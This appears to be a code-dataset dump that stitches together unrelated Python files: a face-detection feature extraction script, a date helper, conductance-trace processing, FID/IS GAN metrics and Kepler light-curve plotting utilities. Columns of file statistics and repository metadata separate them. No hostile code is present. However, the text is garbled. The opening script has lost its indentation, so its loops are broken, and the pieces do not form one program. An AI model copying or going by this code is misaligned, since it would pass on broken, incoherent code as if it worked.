train_non_faces_files.sort()
data = np.array([[]])
t0 = time.time()
for names in train_faces_files:
image = cv2.imread(names,cv2.IMREAD_GRAYSCALE)
i_image = intergal_image(image)
f = feature_extraction(i_image)
data = np.append(data,f)
num_image = len(train_faces_files)
num_feature = int(len(data)/num_image)
data = np.resize(data, (num_image,num_feature))
temp_data = np.array([[]])
for names in train_non_faces_files:
image = cv2.imread(names,cv2.IMREAD_GRAYSCALE)
i_image = intergal_image(image)
f = feature_extraction(i_image)
temp_data = np.append(temp_data,f)
num_image = int(len(temp_data)/num_feature)
temp_data = np.resize(temp_data, (num_image,num_feature))
label = [1]*len(train_faces_files)
label_non_faces = [-1] * len(train_non_faces_files)
label = np.append(label,label_non_faces)
total_data = np.concatenate((data,temp_data),axis=0)
final = np.insert(total_data, num_feature ,label,axis=1)
pd.DataFrame((final).astype(int)).to_csv(base_path+ "/train_data.csv",header=None, index=None,float_format= '%10.5f')
t1 = time.time()
print((t1-t0)/60)
#---------------------------------------------------------------------------------------------------------------------
# test file
train_faces_files = glob.glob(base_path+ '/dataset/testset/faces/*.png')
train_faces_files.sort()
train_non_faces_files = glob.glob(base_path+ '/dataset/testset/non-faces/*.png')
train_non_faces_files.sort()
data = np.array([[]])
t0 = time.time()
for names in train_faces_files:
image = cv2.imread(names,cv2.IMREAD_GRAYSCALE)
i_image = intergal_image(image)
f = feature_extraction(i_image)
data = np.append(data,f)
num_image = len(train_faces_files)
num_feature = int(len(data)/num_image)
data = np.resize(data, (num_image,num_feature))
temp_data = np.array([[]])
for names in train_non_faces_files:
image = cv2.imread(names,cv2.IMREAD_GRAYSCALE)
i_image = intergal_image(image)
f = feature_extraction(i_image)
temp_data = np.append(temp_data,f)
num_image = int(len(temp_data)/num_feature)
temp_data = np.resize(temp_data, (num_image,num_feature))
label = [1]*len(train_faces_files)
label_non_faces = [-1] * len(train_non_faces_files)
label = np.append(label,label_non_faces)
total_data = np.concatenate((data,temp_data),axis=0)
final = np.insert(total_data, num_feature ,label,axis=1)
#final.tofile(base_path + 'train_data.csv',sep=',',format='%10.5f')
pd.DataFrame((final).astype(int)).to_csv(base_path+ "/test_data.csv",header=None, index=None,float_format= '%10.5f')
t1 = time.time()
print((t1-t0)/60)
#---------------------------------------------------------------------------------------------------------------------
| 43.591241
| 252
| 0.611855
| 1,026
| 5,972
| 3.396686
| 0.11501
| 0.1033
| 0.1033
| 0.050502
| 0.814921
| 0.796844
| 0.792253
| 0.759254
| 0.713917
| 0.65538
| 0
| 0.033926
| 0.180676
| 5,972
| 136
| 253
| 43.911765
| 0.678316
| 0.136805
| 0
| 0.695652
| 0
| 0
| 0.031712
| 0.023735
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017391
| false
| 0
| 0.06087
| 0
| 0.095652
| 0.06087
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c77cd30812a9e70f01088285d7cc9ee58cd2135c
| 160
|
py
|
Python
|
Part_3_advanced/m08_abstract_protocol/abstract_class/homework_1_start/new_movies/datetime_utils.py
|
Mikma03/InfoShareacademy_Python_Courses
|
3df1008c8c92831bebf1625f960f25b39d6987e6
|
[
"MIT"
] | null | null | null |
Part_3_advanced/m08_abstract_protocol/abstract_class/homework_1_start/new_movies/datetime_utils.py
|
Mikma03/InfoShareacademy_Python_Courses
|
3df1008c8c92831bebf1625f960f25b39d6987e6
|
[
"MIT"
] | null | null | null |
Part_3_advanced/m08_abstract_protocol/abstract_class/homework_1_start/new_movies/datetime_utils.py
|
Mikma03/InfoShareacademy_Python_Courses
|
3df1008c8c92831bebf1625f960f25b39d6987e6
|
[
"MIT"
] | null | null | null |
from dateutil.relativedelta import relativedelta # type: ignore
def full_years_between_dates(later, earlier):
return relativedelta(later, earlier).years
| 26.666667
| 64
| 0.80625
| 19
| 160
| 6.631579
| 0.736842
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 160
| 5
| 65
| 32
| 0.9
| 0.075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
c782833324e4ef984f5e35fae938eed30c294c73
| 5,845
|
py
|
Python
|
basic_analysis_module/drawDataProcessUtils.py
|
PeterPaaan/XMe_DataAnalysis
|
0f95cec3bc99ab8895133aea78ddedbd649c1834
|
[
"Apache-2.0"
] | null | null | null |
basic_analysis_module/drawDataProcessUtils.py
|
PeterPaaan/XMe_DataAnalysis
|
0f95cec3bc99ab8895133aea78ddedbd649c1834
|
[
"Apache-2.0"
] | null | null | null |
basic_analysis_module/drawDataProcessUtils.py
|
PeterPaaan/XMe_DataAnalysis
|
0f95cec3bc99ab8895133aea78ddedbd649c1834
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 2021/9/8 22:09
# @Author : Gang
# @File : drawDataProcessUtils.py
import numpy as np
from basicAnalysisConst import *
from myLog.MyLog import *
class DrawDataProcessUtils:
logger = MyLog("DrawDataProcessUtils", BASEDIR)
@classmethod
def calculate_draw_data(cls, data, key_para):
SAMPLING_RATE = key_para["le_Sampling_Rate"]
STRETCHING_RATE = key_para["le_Stretching_Rate"]
PIEZO_RATE = key_para["le_Piezo_Rate"]
# TODO
# piezo的使用还没有加进来,问题的关键就是这个换算关系取决于压电,就很蛋疼
FACTOR = STRETCHING_RATE / SAMPLING_RATE
log_G, start, zero, end, len_high, len_low, *_ = data
ALL_TRACE_NUM = len(start)
SELECT_TRACE_NUM = ALL_TRACE_NUM
# datacut_temp=[[[(j-zero[i])*FACTOR,log_G[j]] for j in range(start[i],end[i])]for i in range(TRUE_NUM)]
# 上的这种写法先放放
# 经过实验,可以知道的是上面这种写法被淘汰,另外,下面的双循环的方法可以被下面的矢量化的方法部分取代
# distance=np.array([[(j-zero[i])*FACTOR for j in range(start[i],end[i])] for i in range(ALL_TRACE_NUM)])
# conductance=np.array([[log_G[j] for j in range(start[i],end[i])] for i in range(ALL_TRACE_NUM)])
# length=np.array([(len_low[i]-len_high[i])*FACTOR for i in range(ALL_TRACE_NUM)])
distance = np.array([(np.arange(start[i], end[i]) - zero[i]) * FACTOR for i in range(ALL_TRACE_NUM)])
conductance = np.array([log_G[np.arange(start[i], end[i])] for i in range(ALL_TRACE_NUM)])
length = (len_low - len_high) * FACTOR
distance_draw = distance.reshape(-1)
conductance_draw = conductance.reshape(-1)
return distance, conductance, length, distance_draw, conductance_draw, ALL_TRACE_NUM, SELECT_TRACE_NUM
@classmethod
def calculate_draw_data_with_select(cls, data, key_para):
SAMPLING_RATE = key_para["le_Sampling_Rate"]
STRETCHING_RATE = key_para["le_Stretching_Rate"]
PIEZO_RATE = key_para["le_Piezo_Rate"]
UPPER_LIMIT1 = key_para["le_Upper_Limit1"]
UPPER_LIMIT2 = key_para["le_Upper_Limit2"]
LOW_LIMIT1 = key_para["le_Low_Limit1"]
LOW_LIMIT2 = key_para["le_Low_Limit2"]
FACTOR = STRETCHING_RATE / SAMPLING_RATE
log_G, start, zero, end, len_high, len_low, start1, end1, start2, end2 = data
ALL_TRACE_NUM = len(start)
# VALID_TRACE_INDEX=[]
# for i in range(TRUE_NUM):
# temp1=(end1[i]-start1[i])*FACTOR
# temp2=(end2[i]-start2[i])*FACTOR
# if temp1>UPPER_LIMIT1 or temp1>UPPER_LIMIT2 or temp1<LOW_LIMIT1 or temp2<LOW_LIMIT2:
# continue
# VALID_TRACE_INDEX.append(i)
# 我认为下面的写法效率更高,可以等后面测试
temp1 = (end1 - start1) * FACTOR
temp2 = (end2 - start2) * FACTOR
VALID_TRACE_INDEX = \
np.where((temp1 >= LOW_LIMIT1) & (temp1 <= UPPER_LIMIT1) & (temp2 >= LOW_LIMIT2) & (temp2 <= UPPER_LIMIT2))[
0]
distance = np.array([(np.arange(start[i], end[i]) - zero[i]) * FACTOR for i in VALID_TRACE_INDEX])
conductance = np.array([log_G[np.arange(start[i], end[i])] for i in VALID_TRACE_INDEX])
length = np.array([(len_low[i] - len_high[i]) * FACTOR for i in VALID_TRACE_INDEX])
distance_draw = distance.reshape(-1)
conductance_draw = conductance.reshape(-1)
SELECT_TRACE_NUM = len(VALID_TRACE_INDEX)
return distance, conductance, length, distance_draw, conductance_draw, ALL_TRACE_NUM, SELECT_TRACE_NUM
@classmethod
def calculate_draw_data_close(cls, data, key_para):
SAMPLING_RATE = key_para["le_Sampling_Rate"]
STRETCHING_RATE = key_para["le_Stretching_Rate"]
PIEZO_RATE = key_para["le_Piezo_Rate"]
# TODO
# piezo的使用还没有加进来,问题的关键就是这个换算关系取决于压电,就很蛋疼
FACTOR = STRETCHING_RATE / SAMPLING_RATE
log_G, start, zero, end, len_high, len_low, *_ = data
ALL_TRACE_NUM = len(start)
SELECT_TRACE_NUM = ALL_TRACE_NUM
distance = np.array([(zero[i] - np.arange(start[i], end[i])) * FACTOR for i in range(ALL_TRACE_NUM)])
conductance = np.array([log_G[np.arange(start[i], end[i])] for i in range(ALL_TRACE_NUM)])
length = (len_high - len_low) * FACTOR
distance_draw = distance.reshape(-1)
conductance_draw = conductance.reshape(-1)
return distance, conductance, length, distance_draw, conductance_draw, ALL_TRACE_NUM, SELECT_TRACE_NUM
@classmethod
def calculate_draw_data_close_with_select(cls, data, key_para):
SAMPLING_RATE = key_para["le_Sampling_Rate"]
STRETCHING_RATE = key_para["le_Stretching_Rate"]
PIEZO_RATE = key_para["le_Piezo_Rate"]
UPPER_LIMIT1 = key_para["le_Upper_Limit1"]
UPPER_LIMIT2 = key_para["le_Upper_Limit2"]
LOW_LIMIT1 = key_para["le_Low_Limit1"]
LOW_LIMIT2 = key_para["le_Low_Limit2"]
FACTOR = STRETCHING_RATE / SAMPLING_RATE
log_G, start, zero, end, len_high, len_low, start1, end1, start2, end2 = data
ALL_TRACE_NUM = len(start)
temp1 = (start1 - end1) * FACTOR
temp2 = (start2 - end2) * FACTOR
VALID_TRACE_INDEX = np.where(
(temp1 >= LOW_LIMIT1) & (temp1 <= UPPER_LIMIT1) & (temp2 >= LOW_LIMIT2) & (temp2 <= UPPER_LIMIT2)
)[0]
distance = np.array([(zero[i] - np.arange(start[i], end[i])) * FACTOR for i in VALID_TRACE_INDEX])
conductance = np.array([log_G[np.arange(start[i], end[i])] for i in VALID_TRACE_INDEX])
length = np.array([(len_high[i] - len_low[i]) * FACTOR for i in VALID_TRACE_INDEX])
distance_draw = distance.reshape(-1)
conductance_draw = conductance.reshape(-1)
SELECT_TRACE_NUM = len(VALID_TRACE_INDEX)
return distance, conductance, length, distance_draw, conductance_draw, ALL_TRACE_NUM, SELECT_TRACE_NUM
| 44.280303
| 120
| 0.656116
| 804
| 5,845
| 4.470149
| 0.118159
| 0.055648
| 0.050083
| 0.043406
| 0.840846
| 0.83222
| 0.825264
| 0.825264
| 0.825264
| 0.820812
| 0
| 0.019244
| 0.226518
| 5,845
| 131
| 121
| 44.618321
| 0.775713
| 0.155518
| 0
| 0.674699
| 0
| 0
| 0.065147
| 0
| 0
| 0
| 0
| 0.007634
| 0
| 1
| 0.048193
| false
| 0
| 0.036145
| 0
| 0.156627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c7d682ee843c20b1c3e5a2587f5980f332c048d9
| 4,524
|
py
|
Python
|
GAN/AC-BIGGAN-with-CIFAR10/utils/metrics.py
|
kiritowu/Deep-Learning
|
baaec55a3b32f9e02ca3d834f1408f6736bdc170
|
[
"MIT"
] | 3
|
2021-12-16T02:26:10.000Z
|
2022-02-23T16:52:34.000Z
|
GAN/AC-BIGGAN-with-CIFAR10/utils/metrics.py
|
kiritowu/Deep-Learning
|
baaec55a3b32f9e02ca3d834f1408f6736bdc170
|
[
"MIT"
] | null | null | null |
GAN/AC-BIGGAN-with-CIFAR10/utils/metrics.py
|
kiritowu/Deep-Learning
|
baaec55a3b32f9e02ca3d834f1408f6736bdc170
|
[
"MIT"
] | null | null | null |
from typing import Optional
import torch
import torch.nn as nn
from torch.utils import data
from torchvision import transforms
import PIL.Image as Image
try:
from torchmetrics.image import FID, IS
except ModuleNotFoundError:
raise ModuleNotFoundError(
"torchmetrics is not found. Please install ignite by running `pip install torchmetrics[image]`"
)
class FID10k(FID):
def __init__(self, device=None, **kwargs) -> None:
super().__init__(**kwargs)
if not device:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.to(device)
def interpolate229x229(self, batch):
"""
Resize images to 299 x 299
"""
arr = []
for img in batch:
pil_img = transforms.ToPILImage()(img)
resized_img = pil_img.resize((299, 299), Image.BILINEAR)
img_tensor = transforms.ToTensor()(resized_img)
arr.append(img_tensor)
return torch.stack(arr)
def evaluate10k(
self,
generator: nn.Module,
real_data: data.Dataset,
latent_dim: int,
n_classes: int,
batch_size: int = 100,
sample_size: int = 10_000,
inv_preprocessing=None,
)->float:
n_batch = (sample_size + batch_size - 1) // batch_size
data_loader = data.DataLoader(real_data, batch_size=batch_size)
data_iter = iter(data_loader)
with torch.no_grad():
for index in range(n_batch):
latent_space = torch.normal(
0, 1, (batch_size, latent_dim), device=self._device, requires_grad=False)
gen_labels = torch.randint(
0, n_classes, (batch_size,), device=self._device, requires_grad=False)
real_img, _ = next(data_iter)
fake_img = generator(latent_space, gen_labels)
if inv_preprocessing:
real_img = inv_preprocessing(real_img)
fake_img = inv_preprocessing(fake_img)
uint_real_img = (self.interpolate229x229(real_img)*255).type(torch.uint8)
uint_fake_img = (self.interpolate229x229(fake_img)*255).type(torch.uint8)
uint_real_img = uint_real_img.to(torch.device("cuda" if torch.cuda.is_available() else "cpu"))
uint_fake_img = uint_fake_img.to(torch.device("cuda" if torch.cuda.is_available() else "cpu"))
self.update(uint_real_img, real=True)
self.update(uint_fake_img, real=False)
return self.compute().cpu().item()
class IS10k(IS):
def __init__(self, device=None, **kwargs) -> None:
super().__init__(**kwargs)
if not device:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.to(device)
def interpolate229x229(self, batch):
"""
Resize images to 299 x 299
"""
arr = []
for img in batch:
pil_img = transforms.ToPILImage()(img)
resized_img = pil_img.resize((299, 299), Image.BILINEAR)
img_tensor = transforms.ToTensor()(resized_img)
arr.append(img_tensor)
return torch.stack(arr)
def evaluate10k(
self,
generator: nn.Module,
latent_dim: int,
n_classes: int,
batch_size: int = 100,
sample_size: int = 10_000,
inv_preprocessing = None,
)->float:
n_batch = (sample_size + batch_size - 1) // batch_size
with torch.no_grad():
for index in range(n_batch):
latent_space = torch.normal(
0, 1, (batch_size, latent_dim), device=self._device, requires_grad=False)
gen_labels = torch.randint(
0, n_classes, (batch_size,), device=self._device, requires_grad=False)
fake_img = generator(latent_space, gen_labels)
if inv_preprocessing:
fake_img = inv_preprocessing(fake_img)
uint_fake_img = (self.interpolate229x229(fake_img)*255).type(torch.uint8)
uint_fake_img = uint_fake_img.to(torch.device("cuda" if torch.cuda.is_available() else "cpu"))
self.update(uint_fake_img)
return self.compute()[0].cpu().item()
| 36.483871
| 111
| 0.571618
| 521
| 4,524
| 4.712092
| 0.205374
| 0.045621
| 0.035845
| 0.034623
| 0.765377
| 0.753971
| 0.753971
| 0.727902
| 0.719756
| 0.719756
| 0
| 0.032695
| 0.330681
| 4,524
| 124
| 112
| 36.483871
| 0.778071
| 0.011715
| 0
| 0.723404
| 0
| 0
| 0.029754
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.074468
| 0
| 0.202128
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
40078786194afce550cd4853bc8215e656238d87
| 17,333
|
py
|
Python
|
pyke/kepplot.py
|
ecalifornica/pyke
|
6a3fcc0513cf012044e4420cc4d17064e582d142
|
[
"MIT"
] | null | null | null |
pyke/kepplot.py
|
ecalifornica/pyke
|
6a3fcc0513cf012044e4420cc4d17064e582d142
|
[
"MIT"
] | 1
|
2017-07-25T19:23:05.000Z
|
2017-07-25T19:23:05.000Z
|
pyke/kepplot.py
|
mirca/PyKE
|
6a3fcc0513cf012044e4420cc4d17064e582d142
|
[
"MIT"
] | null | null | null |
from . import kepmsg, kepstat
import math
import numpy as np
from matplotlib import pyplot as plt
def location(shape):
"""shape the window, enforce absolute scaling, rotate the labels"""
# position first axes inside the plotting window
ax = plt.axes(shape)
# force tick labels to be absolute rather than relative
plt.gca().xaxis.set_major_formatter(plt.ScalarFormatter(useOffset=False))
plt.gca().yaxis.set_major_formatter(plt.ScalarFormatter(useOffset=False))
ax.yaxis.set_major_locator(plt.MaxNLocator(5))
# rotate y labels by 90 deg
labels = ax.get_yticklabels()
return ax
def plot1d(x, y, cadence, lcolor, lwidth, fcolor, falpha, underfill):
"""plot a 1d distribution"""
# pad first and last points in case a fill is required
x = np.insert(x, [0], [x[0]])
x = np.append(x, [x[-1]])
y = np.insert(y, [0], [-1.0e10])
y = np.append(y, -1.0e10)
# plot data so that data gaps are not spanned by a line
ltime = np.array([], dtype='float64')
ldata = np.array([], dtype='float32')
for i in range(1, len(x)-1):
if x[i] - x[i - 1] < 2.0 * cadence / 86400:
ltime = np.append(ltime, x[i])
ldata = np.append(ldata, y[i])
else:
plt.plot(ltime, ldata, color=lcolor, linestyle='-',
linewidth=lwidth)
ltime = np.array([], dtype='float64')
ldata = np.array([], dtype='float32')
plt.plot(ltime, ldata, color=lcolor, linestyle='-', linewidth=lwidth)
# plot the fill color below data time series, with no data gaps
if underfill:
plt.fill(x, y, fc=fcolor, linewidth=0.0, alpha=falpha)
def RangeOfPlot(x, y, pad, origin):
"""determine data limits"""
xmin = x.min()
xmax = x.max()
ymin = y.min()
ymax = y.max()
xr = xmax - xmin
yr = ymax - ymin
plt.xlim(xmin - xr * pad, xmax + xr * pad)
plt.ylim(ymin - yr * pad, ymax + yr * pad)
if origin:
if ymin - yr * pad <= 0.0:
plt.ylim(1.0e-10, ymax + yr * pad)
else:
plt.ylim(ymin - yr * pad, ymax + yr * pad)
def cleanx(time, logfile, verbose):
"""clean up x-axis of plot"""
try:
time0 = float(int(time[0] / 100) * 100.0)
if time0 < 2.4e6:
time0 += 2.4e6
timeout = time - time0
label = "BJD $-$ {}".format(time0)
except:
txt = ("ERROR -- KEPPLOT.CLEANX: cannot calculate plot scaling in "
"x dimension")
kepmsg.err(logfile, txt, verbose)
return timeout, label
def cleany(signal, cadence, logfile, verbose):
"""clean up y-axis of plot"""
try:
signal /= cadence
nrm = math.ceil(math.log10(np.nanmax(signal))) - 1.0
signal = signal / 10 ** nrm
if nrm == 0:
label = 'Flux (e$^-$ s$^{-1}$)'
else:
label = "Flux ($10^%d$" % nrm + "e$^-$ s$^{-1}$)"
except:
txt = ("ERROR -- KEPPLOT.CLEANY: cannot calculate plot scaling in "
"y dimension")
kepmsg.err(logfile, txt, verbose)
return signal, label
def limits(x, y, logfile, verbose):
"""plot limits"""
try:
xmin = x.min()
xmax = x.max()
ymin = y.min()
ymax = y.max()
xr = xmax - xmin
yr = ymax - ymin
x = np.insert(x, [0], [x[0]])
x = np.append(x, [x[-1]])
y = np.insert(y, [0], [0.0])
y = np.append(y, 0.0)
except:
txt = 'ERROR -- KEPPLOT.LIMITS: cannot calculate plot limits'
kepmsg.err(logfile, txt, verbose)
return x, y, xmin, xmax, xr, ymin, ymax, yr
def labels(xlab, ylab, labcol, fs):
"""plot labels"""
plt.xlabel(xlab, fontsize=fs, color=labcol)
plt.ylabel(ylab, fontsize=fs, color=labcol)
def intScale1D(image, imscale):
"""intensity scale limits of 1d array"""
nstat = 2; work2 = []
image = np.ma.array(image, mask=np.isnan(image))
work1 = np.array(np.sort(image), dtype=np.float32)
for i in range(len(work1)):
if 'nan' not in str(work1[i]).lower():
work2.append(work1[i])
work2 = np.array(work2, dtype=np.float32)
if int(float(len(work2)) / 10 + 0.5) > nstat:
nstat = int(float(len(work2)) / 10 + 0.5)
zmin = np.median(work2[:nstat])
zmax = np.median(work2[-nstat:])
if imscale == 'logarithmic':
if zmin < 0.0:
zmin = 100.0
if np.any(image <= 0):
image = np.log10(image + abs(image.min()) + 1)
else:
image = np.log10(image)
zmin = math.log10(zmin)
zmax = math.log10(zmax)
if imscale == 'squareroot':
if zmin < 0.0:
zmin = 100.0
if np.any(image < 0):
image = np.sqrt(image + abs(image.min()))
else:
image = np.sqrt(image)
zmin = math.sqrt(zmin)
zmax = math.sqrt(zmax)
return image, zmin, zmax
def intScale2D(image, imscale):
"""intensity scale limits of 2d array"""
nstat = 2
work1 = np.array([], dtype=np.float32)
(ysiz, xsiz) = np.shape(image)
for i in range(ysiz):
for j in range(xsiz):
if np.isfinite(image[i, j]) and image[i, j] > 0.0:
work1 = np.append(work1, image[i, j])
work2 = np.array(np.sort(work1))
if int(float(len(work2)) / 1000 + 0.5) > nstat:
nstat = int(float(len(work2)) / 1000 + 0.5)
zmin = np.median(work2[:nstat])
zmax = np.median(work2[-nstat:])
if imscale == 'logarithmic':
image = np.log10(image)
zmin = math.log10(zmin)
zmax = math.log10(zmax)
if imscale == 'squareroot':
image = np.sqrt(image)
zmin = math.sqrt(zmin)
zmax = math.sqrt(zmax)
return image, zmin, zmax
def borders(maskimg, xdim, ydim, pixcoord1, pixcoord2, bit, lcolor, lstyle, lwidth):
"""plot mask borders in CCD coordinates"""
for i in range(1, ydim):
for j in range(1, xdim):
if (kepstat.bitInBitmap(maskimg[i, j], bit) and not
kepstat.bitInBitmap(maskimg[i - 1, j], bit)):
x = np.array([pixcoord1[j - 1, i], pixcoord1[j, i]]) + 0.5
y = np.array([pixcoord2[j, i], pixcoord2[j , i]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if (not kepstat.bitInBitmap(maskimg[i, j], bit) and
kepstat.bitInBitmap(maskimg[i - 1, j], bit)):
x = np.array([pixcoord1[j - 1, i], pixcoord1[j, i]]) + 0.5
y = np.array([pixcoord2[j, i], pixcoord2[j, i]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if (kepstat.bitInBitmap(maskimg[i, j], bit) and not
kepstat.bitInBitmap(maskimg[i, j - 1], bit)):
x = np.array([pixcoord1[j, i], pixcoord1[j, i]]) - 0.5
y = np.array([pixcoord2[j, i - 1], pixcoord2[j, i]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if (not kepstat.bitInBitmap(maskimg[i, j], bit) and
kepstat.bitInBitmap(maskimg[i, j - 1], bit)):
x = np.array([pixcoord1[j, i], pixcoord1[j, i]]) - 0.5
y = np.array([pixcoord2[j, i - 1],pixcoord2[j, i]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
# corner cases
for j in range(ydim):
try:
if (kepstat.bitInBitmap(maskimg[j, 0], bit) and not
kepstat.bitInBitmap(maskimg[j - 1,0], bit)):
x = np.array([pixcoord1[0, j], pixcoord1[1, j]]) - 0.5
y = np.array([pixcoord2[0, j], pixcoord2[0, j]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
try:
if (not kepstat.bitInBitmap(maskimg[j + 1, 0], bit) and
kepstat.bitInBitmap(maskimg[j,0],bit)):
x = np.array([pixcoord1[0, j], pixcoord1[1, j]]) - 0.5
y = np.array([pixcoord2[0, j], pixcoord2[0, j]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
if kepstat.bitInBitmap(maskimg[j, 0], bit):
x = np.array([pixcoord1[0, j], pixcoord1[0, j]]) - 0.5
try:
y = np.array([pixcoord2[0, j], pixcoord2[0, j + 1]]) - 0.5
except:
y = np.array([pixcoord2[0, j - 1], pixcoord2[0, j]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[j, xdim - 1], bit):
x = np.array([pixcoord1[xdim - 1, j], pixcoord1[xdim - 1, j]]) + 0.5
try:
y = (np.array([pixcoord2[xdim - 1, j],
pixcoord2[xdim - 1, j + 1]]) - 0.5)
except:
y = (np.array([pixcoord2[xdim - 1, j - 1],
pixcoord2[xdim - 1, j]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
for i in range(xdim):
try:
if (kepstat.bitInBitmap(maskimg[0, i], bit) and not
kepstat.bitInBitmap(maskimg[0, i - 1], bit)):
x = np.array([pixcoord1[i, 0], pixcoord1[i, 0]]) - 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
except:
pass
try:
if (not kepstat.bitInBitmap(maskimg[0, i + 1], bit) and
kepstat.bitInBitmap(maskimg[0, i], bit)):
x = np.array([pixcoord1[i, 0], pixcoord1[i, 0]]) + 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
if kepstat.bitInBitmap(maskimg[0, i], bit):
try:
x = np.array([pixcoord1[i, 0], pixcoord1[i + 1, 0]]) - 0.5
except:
x = np.array([pixcoord1[i - 1, 0], pixcoord1[i, 0]]) + 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 0]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[ydim - 1, i], bit):
try:
x = (np.array([pixcoord1[i, ydim - 1],
pixcoord1[i + 1, ydim - 1]]) - 0.5)
except:
x = (np.array([pixcoord1[i - 1, ydim - 1],
pixcoord1[i, ydim - 1]]) - 0.5)
y = np.array([pixcoord2[i, ydim - 1], pixcoord2[i, ydim - 1]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[ydim - 1, xdim - 1], bit):
x = (np.array([pixcoord1[xdim - 2, ydim - 1],
pixcoord1[xdim - 1, ydim - 1]]) + 0.5)
y = (np.array([pixcoord2[xdim - 1, ydim - 1],
pixcoord2[xdim - 1, ydim - 1]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[0, xdim - 1], bit):
x = np.array([pixcoord1[xdim - 1, 0], pixcoord1[xdim - 1, 0]]) + 0.5
y = np.array([pixcoord2[xdim - 1, 0], pixcoord2[xdim - 1, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
return
def PrfBorders(maskimg,xdim,ydim,pixcoord1,pixcoord2,bit,lcolor,lstyle,lwidth):
"""plot mask borders in CCD coordinates"""
for i in range(1, ydim):
for j in range(1, xdim):
if (kepstat.bitInBitmap(maskimg[i, j], bit) and not
kepstat.bitInBitmap(maskimg[i - 1, j], bit)):
x = np.array([pixcoord1[j - 1, i], pixcoord1[j, i]]) + 0.5
y = np.array([pixcoord2[j, i], pixcoord2[j, i]]) - 0.5
plt.plot(x*50, y*50, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
if (not kepstat.bitInBitmap(maskimg[i, j], bit) and
kepstat.bitInBitmap(maskimg[i - 1, j], bit)):
x = np.array([pixcoord1[j - 1, i], pixcoord1[j, i]]) + 0.5
y = np.array([pixcoord2[j , i], pixcoord2[j, i]]) - 0.5
plt.plot(x*50, y*50, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
if (kepstat.bitInBitmap(maskimg[i, j], bit) and not
kepstat.bitInBitmap(maskimg[i, j - 1], bit)):
x = np.array([pixcoord1[j, i], pixcoord1[j, i]]) - 0.5
y = np.array([pixcoord2[j, i - 1], pixcoord2[j, i]]) + 0.5
plt.plot(x*50, y*50, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
if (not kepstat.bitInBitmap(maskimg[i, j], bit) and
kepstat.bitInBitmap(maskimg[i, j - 1], bit)):
x = np.array([pixcoord1[j, i], pixcoord1[j, i]]) - 0.5
y = np.array([pixcoord2[j, i - 1], pixcoord2[j, i]]) + 0.5
plt.plot(x*50, y*50, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
# corner cases
for j in range(ydim):
try:
if (kepstat.bitInBitmap(maskimg[j, 0], bit) and not
kepstat.bitInBitmap(maskimg[j - 1, 0], bit)):
x = np.array([pixcoord1[0, j], pixcoord1[1, j]]) - 0.5
y = np.array([pixcoord2[0, j], pixcoord2[0, j]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
try:
